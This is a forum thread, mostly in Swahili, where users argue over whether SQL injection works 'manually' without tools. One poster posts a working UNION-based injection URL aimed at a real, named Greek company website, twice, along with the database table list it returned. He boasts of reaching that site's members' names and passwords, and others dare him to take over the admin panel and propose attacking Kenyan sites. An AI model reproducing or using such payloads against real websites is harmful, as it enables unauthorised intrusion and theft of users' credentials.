La Cosa Mia
JF-Expert Member
- Feb 11, 2012
- 271
- 127
BTW thanx kwa hiyo "Backtrack" thing...nilikuwa siijui na naiongeza kwenye library yangu soon after nikimaster sql injection nadhani nitakuja kucheki hiyo kitu...
Kaka/Dada Zing....ninakuhakikishia kuwa unaweza kufanya manually na nishafanya sana na nitaweka hapa linki ya websites nilizofanikiwa kufungua database zake ....ni kweli kuna wakati unahitaji tools aidha kuruka kikwazo fulani au kurahisisha mambo ila nashauri mtu anayeanza kujifunza aanze manually na simple websites....unapompa mtu tools bila basic trust me hata wiki mbili hafikishi atazitupilia huko na kusahau kabisa kuhusu haya mambo maana bila kuelewa basics hizo tools zinakuwa ngumu kutumia....Usijaribu kufanya kuwa haya mambo ni magumu sana ndugu yangu...mimi sina elimu yeyote ya IT ila nimeweza japo kidogo kufika mahali fulani na nina jaribu kueleza kwa njia rahisi zaidi kwa mtu anayeanza afanye nini....nishapitia huko....unauliza watu wanakupa malink na matools ili uhangaike nayo mpaka uchoke then ukate tamaa......jamaa hapo kashaanza kuhangaika kuinstall linux....teh teh teh....nina uhakika baada ya mwezi atakuwa kashasahau kama kuna kitu kinaitwa hacking.....hebu soma tu hicho kitabu ulichoweka hapo juu.....wanashauri mtu uanze na HTML...ambayo mimi nimeweka the simplest video tutorial ever na itachukua siku mbili tu kuelewa basics zote za HTML na kuzifanyia kazi....hiyo ni step ya kwanza.....mimi mwenyewe najua umuhimu wa LINUX kwa hacker ila sija_install maana sihitaji kwa sasa bado nafanya simple stuffs mkuu.....namshauri jamaa kama hajaanza kuinstall hiyo linux angalau basi agoogle introduction to hacking ili aelewe ni nini hasa na yeye anataka nini....asije akafakamia madude kumbe hata hana passion na hii kitu.....
Haya bwana Zing nakupa link ya web ambayo nimeshahack uone na uamini kuwa manually inawezekana...of coz hizo ni tables na niliingia kwenye members na nikacheck info zao kuanzia names,passwords,id nk ila sitaingia zaidi ila naonyesha tu hii kama demonstration kuwa inawezekana CLICK HAPA
http://karellas.gr/products.php?id=-13 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--
.
Mkuu are you sure unaweza kufanya hacking manually bila kutumia tool yeyote... Ebu tufafanulie tuongeze ujuzi .....
Manually sio rahisi sababu website nyingi password zinakuwa encypted na mdd5 hash. Na hiyo md5 has. Baada ya encrytion ya md5 kuonekana hacker wanaidecryp password nyingi juu ya md5 wakaongeza na security cryptography ya salt.
sasa wewe hata ukiweza kuacess manualy password kama hiiii inavyohfadhiwa kwenye database (d131dd02c5e6eec4 693d9a0698aff95c 2fcab58712467eab 4004583eb8fb7f89) Utajua ni nin bila tool yeyote.?????
Mkuu mi naona unaongelea theory ambazo hujajaribu bado wich is simple . I challenge you to prove.
Vile vile bila tool utajuaje jina la database kwenye back end na jina la table illloihifadhi majina ya user . May be kama wale wanafonya installtion ya script za Joomla, worprpress Vbulettin , mybb hawabadilishi prefix za table. Lakini kama kabadilisha kitu ambacho wengi wanafanya utajuaje table ya user inaitwaje bila nyenzo........
Au unajuje kuwa webiste hii inatumia database ya Oracle au Msqlserver au Mysql.
MKuu usiseme fundi mzuri wa gari ni yule ambaye hatumii spana . Utafugua nut kwa masaa sita wa mkono wakati ungeweza kufanya hivyo kwa dk, Unachotakiwa kujua ni spana gani inahiajika kufungua au kutest nini. Hapo ndio hacker anatakiwa kujua na kujifunza.
Hiyo njia za phising ni soft side of hacking na wala sio real hacking . Hiyo inaitwa social enginnering. Ni sawa sawa kumwambiai au kumrubuni mtu akupe password yake kijanja bila yeye kujua(Fake web page) alafu useme umehack. yes somehow umehack but not real hacking ....... . Au umtegeshee mtu keyloggoer kwenye mashine akiingiza password unakuja kuzisoma baadae ....... But hata hizo zote bado unahitaji tool kama ya keylogger na fake page...... sasa tool za fake page za FB au gmail ziko mtandaoni nyingi...........
Hacking halisi ni ya kuingia kwenye system halisi yenywe kwa mlango wa nyuma legaly/illegay (backddor) na kupata data.
BTW thanx kwa hiyo "Backtrack" thing...nilikuwa siijui na naiongeza kwenye library yangu soon after nikimaster sql injection nadhani nitakuja kucheki hiyo kitu...
Givenality said:Get serious. I bet you Never never land hauwezi kufanya manual hacking. With mdd5 cryptology, toughest firewall, CMS security tools, anti-sql intjections unadhani you can JUST hack? Hata LulzSec wanatumia tool. IMPOSSIBLE.
Na hii SQL injection unaifanya kwenye database engine gani au PHP version gani au website zinazotumia CMS script gani. Mfano for joomla 1.5 its somehow vulnerabe but with joomla 1.6 and 1.7 tena wewe unayesema manually it can cost you muda. Otherwise Tanzania has one of the genius hacker lol or black hat hacker.......
SQL injection hacking fulani inaweza kushindwa kufanya kazi sababu ya version ya PHP ay Database engine inaytumika.
Nakumbuka nilijaribu kufanya hacking ya kutazamia kwa kutumia tools ambayo yenyewe ndiyo iliyokuwa inatafuta loopholes kwenye wordpress site version 2.5 mpaka 2.9 but the same hacking could not work kwenye wordpres zenye version 3.0. 0 and above.........
Wait may be this guy is in the same level or above the lulSec. Ngoja tujifunze from kwake trough challenging hime . But hiyo ya password nimemwambia kuhusu md5 hash na salt naona kaleta table ambayo ina detal amabzo hata kweye front end zinapatikana
Hii challenge kwa hacker http://karellas.gr
Kwa kuwa umeweza kuacess password hiyo ni CPANEL ya hiyo website iliyohack. Kwa kutumia password ya admin fanya mambo tuone.
Kumbe Tanzania na sisi tumo. TUtafute site za kenya tuzitumie kufanya majaribio lol
You are speaking everything I want to hear. So tuanaanza vipy?
Kwa aliyemakini anaweza kumalizia hapo na kuingia kwenye table yoyote....kwa sasa natumia simu ila nitakufungulia hao members uone passwords zao ndio mfurahi....unauliza maswali ya kitoto ati kwa nini nimeruka namba ngapi?na hizo namba zinamaanisha nini?teh..teh...teh....niko mihangaikoni mkuu nikija nakuja na majibu yako...sikupenda tu kuexpose passwords za watu...tunapanchi mpaka mkome wenyewe...mambo marahisi haya mnataka kutisha watu...nani kasema sio vizuri kutumia tools...mnasoma vizuri post zangu...btw nimetumia hackbar tu!
Haya sasa ID na PASSWORD za members hizo hapo...CLICK HAPA....au nikupe NAMES NA PASSWORDS haya CLICK HAPA...kaka nadhani ubishi umeisha...
http://karellas.gr/products.php?id=-13 union select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--
TESTATABLE,active,categories,codes_table,cookiehits,cookies,educational,episkeues,fileacces,gallery,guestbook,links,marfin,members,news_table,partners,products,products_videos,products_videos1,videos,visa_table